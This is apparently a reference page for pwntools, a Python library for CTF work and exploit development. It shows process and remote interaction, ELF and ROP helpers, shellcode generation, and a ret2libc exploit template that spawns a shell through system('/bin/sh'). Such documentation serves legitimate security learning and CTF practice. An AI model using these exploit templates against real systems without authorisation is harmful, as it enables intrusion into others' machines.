Description
pwntools is a CTF framework and exploit development library. It provides everything needed for rapid exploit prototyping: process interaction, remote connections, binary analysis, ROP chains, shellcode, and more.
Installation
BASH
pip install pwntools
# With all extras
pip install pwntools[all]Basic Usage
PYTHON
from pwn import *
# Connect to process
p = process('./binary')
# Connect to remote
p = remote('target.com', 1337)
# Send/receive
p.sendline(b'hello')
response = p.recvline()
# Interactive shell
p.interactive()
# Packing
p64(0xdeadbeef) # Pack 64-bit
u64(data) # Unpack 64-bit
p32(0x41414141) # Pack 32-bitAdvanced Usage
PYTHON
from pwn import *
context.binary = './binary'
context.log_level = 'debug'
# ELF analysis
elf = ELF('./binary')
elf.symbols['main'] # Address of main
elf.got['puts'] # GOT entry
elf.plt['system'] # PLT entry
# ROP chains
rop = ROP(elf)
rop.call('puts', [elf.got['puts']])
rop.call('main')
# Shellcode
shellcode = asm(shellcraft.sh())
shellcode = asm(shellcraft.amd64.linux.sh())
# Format string
fmtstr_payload(offset, {target: value})
# De Bruijn patterns
cyclic(200) # Generate
cyclic_find(0x61616168) # Find offset
# GDB integration
gdb.attach(p, 'break main')Common Workflows
PYTHON
# Ret2libc exploit template
from pwn import *
context.binary = elf = ELF('./vuln')
libc = ELF('./libc.so.6')
p = process('./vuln')
# Leak libc address
payload = flat(b'A' * offset, rop_chain_to_leak_puts)
p.sendline(payload)
libc_leak = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = libc_leak - libc.symbols['puts']
# Ret2system
payload = flat(b'A' * offset, pop_rdi, next(libc.search(b'/bin/sh')), libc.symbols['system'])
p.sendline(payload)
p.interactive()